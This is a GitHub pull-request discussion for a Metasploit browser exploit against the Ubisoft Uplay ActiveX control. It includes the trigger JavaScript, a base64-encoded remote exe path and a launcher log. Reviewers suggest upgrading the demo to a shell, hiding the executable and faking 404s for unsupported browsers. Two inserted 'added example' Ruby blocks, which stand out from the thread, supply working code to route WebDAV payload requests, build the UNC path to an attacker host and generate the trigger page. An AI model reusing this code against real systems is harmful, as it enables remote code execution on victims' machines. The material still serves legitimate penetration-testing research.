
Ubisoft uplay Active X control Command Execution #653

Merged
merged 8 commits into from Aug 6, 2012

Conversation

3 participants
@Meatballs1 (Contributor) commented Jul 30, 2012

This allows the user to run any Windows command.

Tested in WinXP and IE.

Did not appear to work in Win7.

Patched as of today, good turnaround Ubisoft.

Could use some hints as to how to have a 'command line' payload and base64 encoding. Haven't tested the autopwn features (copied from the template exploit). Areas I still need to work out!

@wchen-r7 (Contributor) commented Jul 31, 2012

Thanks for the module. However, exploits are required to pop shells, and to me that looks like you're only popping a calc.exe.

@wchen-r7 (Contributor) commented Jul 31, 2012

If you can pass params, then you can write a staged payload for it. If you can only tell it which executable to run, you may want to try to serve the exe from webdav.

@h0ng10 (Contributor) commented Jul 31, 2012

As far as I know, this should also work with other browsers, not just IE. Mozilla blocks it:
https://addons.mozilla.org/en-US/firefox/blocked/p113

@Meatballs1 (Contributor, Author) commented Jul 31, 2012

Yeah, I tried in Firefox but the ActiveX wasn't registered with it. Dunno how Firefox loads them if it's not looking at the same registry keys as IE, though.

Looking at serving the payload over WebDAV; if not, it can be served over SMB.

@h0ng10 (Contributor) commented Jul 31, 2012

SMB will be difficult; as far as I know Metasploit doesn't provide an SMB server yet (it's been on my wishlist for some time). Also, WebDAV should be preferred for browser exploits, as a firewall between the client and the exploit server might block SMB requests.

@Meatballs1 (Contributor, Author) commented Jul 31, 2012

WebDAV is working, thanks to HDM; just need to clean it up so it knows when to serve the HTML and when to serve the payload.

@Meatballs1 (Contributor, Author) commented Jul 31, 2012

If you wish to test it I have the 2.03 installer. It updates pretty quickly, so the majority of people won't be vulnerable anymore unless they're in offline mode.

Install
Turn off internet
Load
Login
Settings > Offline mode
Turn internet back on if you wish.

No idea why the classid isn't picked up in browser autopwn; the plugin doesn't show up in IE's installed programs, but it is in the registry etc.

@wchen-r7 (Contributor) commented Aug 1, 2012

Yeah, I do need the installer actually... could you please e-mail me? sinn3r[at]metasploit.com. Thanks!

@wchen-r7 (Contributor) commented Aug 1, 2012

Module isn't working for me.

So issue #1, in this line:

path = "#{@exploit_unc}#{@share_name}#{@basename}.exe"

That for me is missing a "\" in the path, so I had to change that:

path = "#{@exploit_unc}#{@share_name}\\#{@basename}.exe"

Issue #2: even though the path is right, WebDAV doesn't seem to be launched by the open() function. It launches Uplay, but no WebDAV requests are actually made according to my Wireshark log. However, if I manually launch WebDAV and then double-click the exe, it works. So that indicates WebDAV is actually working; it's just not launched for some reason. Here's an example of the source for open():

x.open('-orbit_product_id 1 -orbit_exe_path XFwxOTIuMTY4LjIzMi4xXFVjU2dWUk9sXFRGbWp4bUhyLmV4ZQ== uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play');

By the way, here's a trick you can use to hide the executable (you can do a grep on "ishidden" in the exploits directory to find examples):
http://pastebin.com/W81SfjUh

@wchen-r7 (Contributor) commented Aug 1, 2012

And by the way, if it only works on some Windows/IE setups, it's better to check the User-Agent in on_request_uri() before you actually send the exploit. For unsupported targets, you can just send a fake 404.
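The serving decision discussed in the last few comments (when to hand back the trigger HTML, when to answer the WebDAV client, when to serve the payload, and when to fake a 404 for an unsupported browser) as an added, stand-alone example. This is not the module's code and does not use Metasploit's API; the share and exe names are hypothetical placeholders for the random ones a module would generate, and the User-Agent test is the simplest one that matches the thread's "works on IE/Windows only" observation.

```ruby
# Added example, not the module's code: a request router of the shape a
# WebDAV-serving browser exploit needs. It returns what to serve for each
# request so the decision can be tested on its own.

# Hypothetical names; a real module generates random ones.
SHARE_NAME = 'UcSgVROl'
EXE_NAME   = 'TFmjxmHr.exe'
EXE_PATH   = "/#{SHARE_NAME}/#{EXE_NAME}"

# The control only fired from IE on Windows in the thread's testing, so
# any other browser gets a fake 404 instead of the exploit page.
def supported_agent?(user_agent)
  ua = user_agent.to_s
  ua.include?('MSIE') && ua.include?('Windows NT')
end

# Returns [what_to_serve, http_status].
#
# OPTIONS and PROPFIND are sent by the Windows WebDAV Mini-Redirector once
# the launcher opens the UNC path, not by the browser, so they are never
# gated on the browser User-Agent. The same applies to the GET of the exe.
def route(method, uri, user_agent)
  path = uri.to_s.sub(%r{/+\z}, '')   # the redirector may add a trailing slash
  path = '/' if path.empty?

  case method.to_s.upcase
  when 'OPTIONS'
    [:dav_options, 200]
  when 'PROPFIND'
    known = ['/', "/#{SHARE_NAME}", EXE_PATH]
    known.include?(path) ? [:dav_propfind, 207] : [:not_found, 404]
  when 'GET', 'HEAD'
    if path == EXE_PATH
      [:payload_exe, 200]        # the redirector fetching the payload
    elsif supported_agent?(user_agent)
      [:exploit_html, 200]       # the trigger page, IE on Windows only
    else
      [:not_found, 404]          # unsupported browser: fake 404
    end
  else
    [:not_found, 404]
  end
end

if __FILE__ == $0
  p route('GET', '/', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)')
  p route('PROPFIND', "#{EXE_PATH}/", 'Microsoft-WebDAV-MiniRedir/5.1.2600')
  p route('GET', '/', 'Mozilla/5.0 (X11; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1')
end
```

The exact-match on the payload path is deliberate: a server that serves the exe whenever the request merely contains the exe name will happily mask a malformed UNC path (as the thread suspects happened with the missing backslash), whereas an exact match turns that bug into a visible 404 during testing.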

@Meatballs1 (Contributor, Author) commented Aug 2, 2012

Hmm, uplay_steam_mode is missing a - in your paste.

What did you test under, Win7? And did you have your credentials saved for autologin?

For me in Win7 Uplay gets loaded, but the call to the exe never occurs. I've not worked out how this is different from XP, though. I expect it's more likely to be the difference between IE8 and IE9 with the JavaScript handling or some such.

url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"

path = "#{@exploit_unc}#{@share_name}#{@basename}.exe"

@Meatballs1 (Author, Contributor) commented inline, Aug 2, 2012:

Missing \ ?

Probably has worked without it because WebDAV just checks that the path contains the exe name and serves the payload despite the path being wrong :)

<script>
x = document.createElement('OBJECT');
x.classid='#{classid}';document.body.appendChild(x);
x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play');

@Meatballs1 (Author, Contributor) commented inline, Aug 2, 2012:

Check -uplay_steam_mode is intact?


include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,

@Meatballs1 (Author, Contributor) commented inline, Aug 2, 2012:

Check OS?

end

def process_get(cli, request)

@Meatballs1 (Author, Contributor) commented inline, Aug 2, 2012:

Check OS?

@Meatballs1 (Contributor, Author) commented Aug 2, 2012

Just tested it on another machine: work_offline doesn't appear to stop the update process, but specifying an invalid proxy prevents it.

Double-check it hasn't sneakily updated you to 2.04 already!

@Meatballs1 (Contributor, Author) commented Aug 2, 2012

Hmm, tested in Win7 again on a different host, and calc worked.

Was going to watch Procmon to see if anything is different, but handily this log file is used:

C:\Program Files\Ubisoft\Ubisoft Game Launcher\logs\launcher_log.txt

2012-08-02 13:04:12 [ 4912] INFO HubUtils.cpp (162) -- Starting Ubisoft Game Launcher --
2012-08-02 13:04:12 [ 4912] INFO HubUtils.cpp (166) Platform: PC.
2012-08-02 13:04:12 [ 4912] INFO HubUtils.cpp (169) Version: 640.
2012-08-02 13:04:12 [ 4912] INFO HubUtils.cpp (170) Built: Jul 12 2012.
2012-08-02 13:04:16 [ 4912] INFO HubUtils.cpp (182) Command line: "-orbit_product_id" "1" "-orbit_exe_path" "Y2FsYy5leGU=" "-uplay_steam_mode" "" "-uplay_dev_mode" "" "-uplay_dev_mode_auto_play" ""
2012-08-02 13:04:16 [ 4912] INFO Hub.cpp (197) Environment is PROD.
2012-08-02 13:04:17 [ 4812] INFO Settings.cpp (111) Applying forced proxy settings, proxy is 111111111111:80.
2012-08-02 13:04:17 [ 4204] ERROR CheckForStartupGameJob.cpp (49) No configuration found for startup product 1
2012-08-02 13:04:20 [ 4204] ERROR PatchDownloadJob.cpp (277) Failed to get remote forced version. Url is http://static3.cdn.ubi.com/orbit/uplay_launcher_2_0/patches/PC/forced.txt.
2012-08-02 13:04:23 [ 4204] ERROR PatchDownloadJob.cpp (357) Failed to get remote version. Url is http://static3.cdn.ubi.com/orbit/uplay_launcher_2_0/patches/PC/latest.txt.
2012-08-02 13:04:23 [ 5052] ERROR LauncherPatcher.cpp (239) Failed to download patch.
2012-08-02 13:04:23 [ 5052] INFO GameSessionHandler.cpp (560) Dev mode auto play, starting game.
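Two things the thread keeps going back to are the UNC path handed to the control (the `path = ...` line with the missing backslash, and the base64 blob in `-orbit_exe_path`) and the launcher log above, which records the command line the control actually received. The following is an added example that ties the two together; it is not the module's code and not Metasploit's API. It builds the path and the `x.open()` argument string the same way the snippet under review does, and decodes the `Command line:` entry from a constructed log excerpt in the format quoted above, so a tester can confirm what reached the launcher when Uplay starts but the exe never runs. The host, share and exe names are placeholders.

```ruby
require 'base64'

# Added example, not the module's code. Builds the UNC path and the
# x.open() argument string the ActiveX control is handed, and decodes the
# "Command line:" entry the launcher writes to launcher_log.txt.

# exploit_unc is the "\\host\" prefix, share_name the WebDAV resource,
# basename the exe name without extension. The backslash between share and
# exe is the one the review found missing.
def payload_unc(exploit_unc, share_name, basename)
  "#{exploit_unc}#{share_name}\\#{basename}.exe"
end

# -orbit_exe_path is base64. strict_encode64 emits no newline (a newline
# would break the command line); base64 also keeps backslashes out of the
# single-quoted JavaScript string, where they would be escape characters.
def uplay_args(exe_path)
  enc = Base64.strict_encode64(exe_path)
  "-orbit_product_id 1 -orbit_exe_path #{enc} " \
    "-uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play"
end

# Trigger page in the same shape as the snippet under review. classid is
# whatever the caller passes; the real value comes from the module.
def trigger_html(classid, exe_path)
  <<~HTML
    <html><body><script>
    x = document.createElement('OBJECT');
    x.classid='#{classid}';document.body.appendChild(x);
    x.open('#{uplay_args(exe_path)}');
    </script></body></html>
  HTML
end

# Parse the launcher's "Command line:" entry and decode the exe path it
# actually received. Returns nil if the entry is absent or not valid base64.
CMDLINE_RE = /Command line: (.*)$/

def launcher_exe_path(log_text)
  line = log_text.lines.find { |l| l =~ CMDLINE_RE }
  return nil unless line
  # The launcher quotes every argument, including empty ones ("").
  tokens = line[CMDLINE_RE, 1].scan(/"([^"]*)"/).flatten
  i = tokens.index('-orbit_exe_path')
  return nil unless i && tokens[i + 1]
  Base64.strict_decode64(tokens[i + 1])
rescue ArgumentError
  nil
end

# Constructed log excerpt in the same format as the one quoted above
# (Y2FsYy5leGU= is "calc.exe").
SAMPLE_LOG = <<~LOG
  2012-08-02 13:04:12 [ 4912] INFO HubUtils.cpp (162) -- Starting Ubisoft Game Launcher --
  2012-08-02 13:04:16 [ 4912] INFO HubUtils.cpp (182) Command line: "-orbit_product_id" "1" "-orbit_exe_path" "Y2FsYy5leGU=" "-uplay_steam_mode" "" "-uplay_dev_mode" "" "-uplay_dev_mode_auto_play" ""
  2012-08-02 13:04:23 [ 5052] INFO GameSessionHandler.cpp (560) Dev mode auto play, starting game.
LOG

if __FILE__ == $0
  unc = payload_unc("\\\\192.168.232.1\\", 'UcSgVROl', 'TFmjxmHr')
  puts unc
  puts uplay_args(unc)
  puts launcher_exe_path(SAMPLE_LOG)   # calc.exe
end
```

Run against a real launcher_log.txt, `launcher_exe_path` shows whether the launcher saw the UNC path you intended; if it prints the right path and no WebDAV traffic follows, the problem is on the launcher side rather than in the page, which is the distinction the thread was trying to draw.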

@wchen-r7 (Contributor) commented Aug 3, 2012

I actually didn't sign up for an account, I'll have to do this again.

@wchen-r7 (Contributor) commented Aug 6, 2012

On this...

@wchen-r7 wchen-r7 merged commit 1aacea9 into rapid7:master Aug 6, 2012
